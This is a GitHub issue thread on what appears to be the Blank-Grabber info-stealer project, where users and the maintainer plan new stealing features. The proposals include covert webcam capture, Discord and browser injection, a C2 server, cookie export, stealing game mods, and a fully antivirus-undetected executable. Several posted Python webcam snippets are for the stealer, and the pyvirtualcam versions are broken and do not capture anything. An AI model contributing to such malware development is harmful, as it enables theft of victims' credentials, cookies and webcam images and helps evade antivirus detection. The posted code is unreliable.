-
Notifications
You must be signed in to change notification settings - Fork 223
suggestions : more features #260
Comments
|
hmmmmmm Also find some good no dualhook js injection for discord browsers and other things like Gmail and YouTube For the c2 u should make one in py I mean just host one at local host or 127.0.0.1 or smth like that with a secret key tat can be like the webhook or smth |
Oh and also make cookies importable like making them into .json or Netscape and also make py be able to take pictures form webcam I will provide some sample untested code bcz I'm on phone |
Cookies are already in netscape format. The py file can already take webcam pics. |
Webcam code untested import cv2 def take_webcam_screenshot():
def check_webcam_available():
#the late reply 😁😁😁😁
Call the function to check webcam availability (for log lol)cam = check_webcam_available() Call the function to take a screenshot lol wat am i dointake_webcam_screenshot() @Blank-c modify it accordingly |
And more features lemme just |
The py file is already much obfuscated and further obfuscation isn't changing the detection rate. I have tried it
You can leverage the add to startup option for this
One need to port forward their host in order to do this and also this project is a mere stealer, I don't want to turn it into a rat. |
I know this, but opencv is a very large library and it would make the executable very large. |
... no it won't just import only required things |
It was never abt a rat |
And importabl cookies |
@Blank-c better code tat imports required things from cv2 import VideoCapture, imwrite, imshow, waitKey, destroyAllWindows
def take_webcam_screenshot():
# Check if a webcam is available
if cam == "cam_yes":
# Open the webcam
cap = VideoCapture(0)
# Check if the webcam is opened successfully
if not cap.isOpened():
print("Unable to open the webcam.")
return
# Read a frame from the webcam
ret, frame = cap.read()
# Check if a frame is successfully read
if not ret:
print("Unable to capture a frame.")
return
# Release the webcam
cap.release()
# Save the frame as an image file
imwrite("screenshot.jpg", frame)
print("Screenshot captured and saved as screenshot.jpg")
# Display the captured frame (optional)
imshow("Webcam Screenshot", frame)
waitKey(0)
destroyAllWindows()
else:
print("No webcam detected.")
def check_webcam_available():
# Attempt to open the webcam
cap = VideoCapture(0)
# Check if the webcam is opened successfully
if cap.isOpened():
cam = "cam_yes" # Webcam detected
else:
cam = "cam_no" # No webcam detected
# Release the webcam
cap.release()
return cam
# Call the function to check webcam availability
cam = check_webcam_available()
# Call the function to take a screenshot
take_webcam_screenshot() |
It does,
The basic idea of a rat is a piece of malware which can remotely be accessed by the attacker, if we can make localhost or our own server as a C2, it would typically become a remote access trojan.
Cookies are already importable in firefox, see #133 |
This still import the |
Time to find an alternative to cv2 |
Also find some good injection for discord and browsers |
This might work from PIL import Image
import numpy as np
import pyvirtualcam
def check_webcam_available():
try:
with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
cam.start()
cam.stop()
return "cam_yes" # Webcam detected
except pyvirtualcam.DeviceNotFoundError:
return "cam_no" # No webcam detected
def take_webcam_screenshot():
# Check if a webcam is available
if cam == "cam_yes":
with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
# Capture a screenshot
image = Image.open('screenshot.jpg')
# Resize the image to match the webcam resolution
image = image.resize((640, 480))
# Convert the image to RGB format
image = image.convert('RGB')
# Convert the image to a numpy array
frame = np.array(image)
# Send the frame to the virtual webcam
cam.send(frame)
print("Screenshot captured and sent to the webcam.")
else:
print("No webcam detected.")
# Call the function to check webcam availability
cam = check_webcam_available()
# Call the function to take a screenshot
take_webcam_screenshot() |
@Blank-c try i made it on a simple notepad On phon |
Bro you literally import numpy, the exe would be very huge. |
Awwwwwwwwwww |
which code? |
Ur bank-graber whol code in on pc |
+I'm a dev |
+this new code has 0 numpy from PIL import Image
import pyvirtualcam
def check_webcam_available():
try:
with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
cam.start()
cam.stop()
return "cam_yes" # Webcam detected
except pyvirtualcam.DeviceNotFoundError:
return "cam_no" # No webcam detected
def take_webcam_screenshot():
# Check if a webcam is available
if cam == "cam_yes":
with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
# Capture a screenshot
image = Image.open('screenshot.jpg')
# Resize the image to match the webcam resolution
image = image.resize((640, 480))
# Convert the image to RGB format
image = image.convert('RGB')
# Create a byte array from the image data
frame = image.tobytes()
# Send the frame to the virtual webcam
cam.send(frame)
print("Screenshot captured and sent to the webcam.")
else:
print("No webcam detected.")
# Call the function to check webcam availability
cam = check_webcam_available()
# Call the function to take a screenshot
take_webcam_screenshot() |
Isn't the code already on github |
No webcams available ... |
u dont have webacm |
Bruh, I litterally have one, did you test the code yourself? |
no my pc is still bootin also i dont have webcam |
just forget abt pycam for a sec ill figure it out i alwaws do now for .js injections |
emme look atmur code |
didnt find yet |
K |
Add feature to steal mc mods under 10 mb |
Adjustable common file size |
And txt will all installed apps |
I am quite busy this month, you may experiment with the code and make a pull request. |
ok |
@Blank-c why is files rar ed why not ziped with . zip |
Python has no built in password protection for zip file, so the stealer uses 3rd party app which uses rar format. |
k |
@Blank-c i want to add smth can i have adder perms or smth |
and where is the tempfolder? |
where founfd? |
You can easily add something. Just fork the repo using the fork button and makw your changes in the forked repository under your account. Then simply make a pull request. If I like it, I'll accept the changes and the code will be added to this. |
https://github.com/Blank-c/Blank-Grabber/blob/main/Blank%20Grabber/Components/stub.py#L912-L917 |
@Blank-c which path |
oh ok in temp |
a temp folder in the temp dir |
i made updated .bat and updated readme.txt so tat they r actually helpful |
how does stub.py rars the folder there is no rar.exe anymore |
It is in the components folder. |
The rar.exe is packed with the other files in the |
ill make a pull request @Blank-c |
also those cookies tat we get in a .txt r they netscape @Blank-c |
yes they are. |
I'll check when I get home. |
@Blank-c I have good ideas for some features
Some of them are :-
fully undetected exe file 0/64 virustotal
Better discord and browser injection
more c2 servers
The text was updated successfully, but these errors were encountered: